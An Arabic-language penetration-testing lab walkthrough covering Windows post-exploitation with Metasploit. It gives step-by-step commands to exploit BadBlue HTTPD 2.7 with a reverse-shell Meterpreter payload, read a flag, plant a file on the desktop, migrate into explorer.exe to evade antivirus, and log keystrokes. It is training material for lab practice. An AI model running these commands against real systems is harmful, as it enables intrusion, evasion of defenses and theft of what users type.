✨ المختبر 20: Windows File and Keylogging Lab (Meterpreter Post-Exploitation)

🎯 الهدف الأساسي: بعد الحصول على جلسة Meterpreter، تنفيذ مهام ما بعد الاستغلال مثل قراءة الفلاج، إنشاء ملف على الديسك توب، ترحيل (Migrate) عملية Meterpreter إلى عملية شرعية، وتشغيل Keylogger لتسجيل ضغطات المفاتيح.

🔧 الأدوات المستخدمة:

• Nmap

• Metasploit Framework (MSFconsole)

• Meterpreter Session

• Windows Command Prompt (CMD)

📜 خطوات التنفيذ:

1. الحصول على جلسة Meterpreter (الوصول الأولي): 🗣️ للبدء في مهام ما بعد الاستغلال، يجب أولاً الحصول على جلسة Meterpreter على نظام Windows المستهدف.

• فحص المنافذ وتحديد خدمة ضعيفة (مثلاً BadBlue HTTPD 2.7):

  nmap -sV -p 80 [عنوان IP الهدف]
  # مثال: Nmap يظهر BadBlue HTTPD 2.7

• استغلال الخدمة للحصول على Meterpreter:

  msfconsole -q
  use exploit/windows/http/badblue_passthru
  set RHOSTS [عنوان IP الهدف]
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST [عنوان IP الخاص بـ Kali]
  set LPORT 4444
  exploit

  🔗 ربط سلسلة الأدوات: لو نجح الاستغلال، فسوف تحصل على جلسة Meterpreter.

2. استرجاع الفلاج: 🗣️ داخل جلسة Meterpreter، فسوف تنتقل إلى سطر الأوامر (CMD Shell) لتبحث عن الفلاج. shell cd C:\ dir type flag.txt # إذا وجدت flag.txt exit # للخروج من الـ shell والعودة لـ Meterpreter 🔑 المعلومة الذهبية: type هو أمر Windows لقراءة محتويات الملفات النصية.

3. إنشاء ملف على سطح المكتب (Desktop) الخاص بالهدف: 🗣️ لـإثبات التحكم، يمكنك إنشاء ملف نصي على سطح مكتب الهدف.

• الانتقال إلى سطح المكتب:

  shell
  cd C:\Users\Administrator\Desktop\ # أو المسار الصحيح لسطح المكتب
  # ملاحظة: في الـ shell، استخدم \\ بدلاً من \ في المسارات.
  dir # للتحقق من عدم وجود الملف
  echo "You have been hacked" > hacked.txt
  dir # للتحقق من إنشاء الملف
  exit

• فتح الملف من Meterpreter: 🗣️ يمكنك فتح الملف على الهدف مباشرةً من Meterpreter.

  execute -f C:\\Users\\Administrator\\Desktop\\hacked.txt

  🔗 ربط سلسلة الأدوات: ستظهر نافذة Notepad على نظام Windows تفتح الملف الذي أنشأته.

4. ترحيل (Migrate) عملية Meterpreter إلى عملية شرعية: 🗣️ لـتجنب اكتشاف برامج مكافحة الفيروسات والحفاظ على الوصول، فسوف ترحّل عملية Meterpreter إلى عملية شرعية أخرى تعمل على نظام Windows (مثلاً explorer.exe).

• عرض العمليات الجارية (Processes):

  ps # ابحث عن عملية مثل explorer.exe ورقم الـ PID الخاص بها.

• ترحيل العملية:

  migrate [PID الخاص بـ explorer.exe] # مثال: migrate 2640

  🔑 المعلومة الذهبية: ترحيل العملية يجعل من الصعب على برامج مكافحة الفيروسات اكتشاف Meterpreter.

5. تشغيل Keylogger وتسجيل ضغطات المفاتيح: 🗣️ لتسجيل كل ما يكتبه المستخدم على لوحة المفاتيح، فسوف تشغل Keylogger.

• بدء Keylogger:

  keyscan_start

• جمع ضغطات المفاتيح: 🗣️ بعد أن يقوم المستخدم بكتابة شيء على الهدف (في Notepad مثلاً)، فسوف تستعرض ما تم تسجيله.

  keyscan_dump

  🔗 ربط سلسلة الأدوات: ستعرض keyscan_dump جميع ضغطات المفاتيح التي تم تسجيلها، بما في ذلك مفاتيح مثل Shift وEnter.

✅ نقاط التحقق:

• تم الحصول على جلسة Meterpreter بنجاح.

• تم استرجاع الفلاج.

• تم إنشاء ملف على سطح مكتب الهدف وفتحه.

• تم ترحيل عملية Meterpreter إلى explorer.exe بنجاح.

• تم تشغيل Keylogger بنجاح وتسجيل ضغطات المفاتيح من الهدف.